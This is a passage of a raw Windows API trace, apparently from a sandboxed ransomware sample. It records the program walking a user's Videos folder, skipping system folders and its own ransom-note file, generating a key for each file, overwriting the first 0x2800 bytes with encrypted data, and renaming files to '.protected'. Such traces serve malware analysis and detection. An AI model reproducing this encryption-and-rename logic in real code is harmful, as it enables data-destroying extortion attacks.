out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\i4k5zpoubo_pu4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.043] StrStrW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".txt") returned 0x0 [0093.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.043] StrStrW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".rar") returned 0x0 [0093.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.043] StrStrW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".zip") returned 0x0 [0093.043] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.044] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.044] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.044] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.044] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.044] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.044] CloseHandle (hObject=0x14c) returned 1 [0093.044] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4.protected") returned 90 [0093.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\i4k5zpoubo_pu4.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\i4k5zpoubo_pu4.mp4.protected")) returned 1 [0093.045] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="Windows") returned -1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="Program Files") returned -1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="Program Files (x86)") returned -1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="$Recycle.bin") returned 1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="System Volume Information") returned -1 [0093.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.045] StrStrIW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".protected") returned 0x0 [0093.045] lstrcmpW (lpString1="jkIkQo-HvvnL.swf", lpString2="RESTORE_FILES.txt") returned -1 [0093.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\jkikqo-hvvnl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.046] StrStrW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".txt") returned 0x0 [0093.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.046] StrStrW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".rar") returned 0x0 [0093.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.046] StrStrW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".zip") returned 0x0 [0093.046] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.047] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.047] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.047] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.047] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.047] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.047] CloseHandle (hObject=0x14c) returned 1 [0093.048] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf.protected") returned 88 [0093.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\jkikqo-hvvnl.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\jkikqo-hvvnl.swf.protected")) returned 1 [0093.048] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="Windows") returned -1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="Program Files") returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="Program Files (x86)") returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="$Recycle.bin") returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="System Volume Information") returned 1 [0093.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf") returned 82 [0093.049] lstrcmpW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2=".") returned 1 [0093.049] lstrcmpW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="..") returned 1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\*") returned 84 [0093.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.049] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.049] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\.") returned 84 [0093.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.049] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\..") returned 85 [0093.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.049] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="Windows") returned -1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="Program Files") returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="Program Files (x86)") returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="$Recycle.bin") returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="System Volume Information") returned 1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.049] StrStrIW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".protected") returned 0x0 [0093.049] lstrcmpW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="RESTORE_FILES.txt") returned 1 [0093.049] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\szymwebummm3ajc7n_h0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.050] StrStrW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".txt") returned 0x0 [0093.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.050] StrStrW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".rar") returned 0x0 [0093.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.050] StrStrW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".zip") returned 0x0 [0093.051] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.051] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.051] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.052] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.052] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.052] CloseHandle (hObject=0x150) returned 1 [0093.052] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi.protected") returned 117 [0093.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\szymwebummm3ajc7n_h0.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\szymwebummm3ajc7n_h0.avi.protected")) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="Windows") returned -1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="Program Files") returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="Program Files (x86)") returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="$Recycle.bin") returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="System Volume Information") returned -1 [0093.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.053] StrStrIW (lpFirst="s_i2.avi", lpSrch=".protected") returned 0x0 [0093.053] lstrcmpW (lpString1="s_i2.avi", lpString2="RESTORE_FILES.txt") returned 1 [0093.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\s_i2.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.054] StrStrW (lpFirst="s_i2.avi", lpSrch=".txt") returned 0x0 [0093.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.054] StrStrW (lpFirst="s_i2.avi", lpSrch=".rar") returned 0x0 [0093.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi") returned 91 [0093.054] StrStrW (lpFirst="s_i2.avi", lpSrch=".zip") returned 0x0 [0093.054] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.055] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.055] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.055] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.055] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.055] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.055] CloseHandle (hObject=0x150) returned 1 [0093.055] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi.protected") returned 101 [0093.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\s_i2.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\s_i2.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\s_i2.avi.protected")) returned 1 [0093.057] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="Windows") returned -1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="Program Files") returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="Program Files (x86)") returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="$Recycle.bin") returned 1 [0093.057] lstrcmpiW (lpString1="tYbh0dSvbMUBd.avi", lpString2="System Volume Information") returned 1 [0093.057] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrIW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".protected") returned 0x0 [0093.057] lstrcmpW (lpString1="tYbh0dSvbMUBd.avi", lpString2="RESTORE_FILES.txt") returned 1 [0093.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.057] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\tybh0dsvbmubd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".txt") returned 0x0 [0093.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".rar") returned 0x0 [0093.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi") returned 100 [0093.057] StrStrW (lpFirst="tYbh0dSvbMUBd.avi", lpSrch=".zip") returned 0x0 [0093.057] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.058] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.058] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.058] 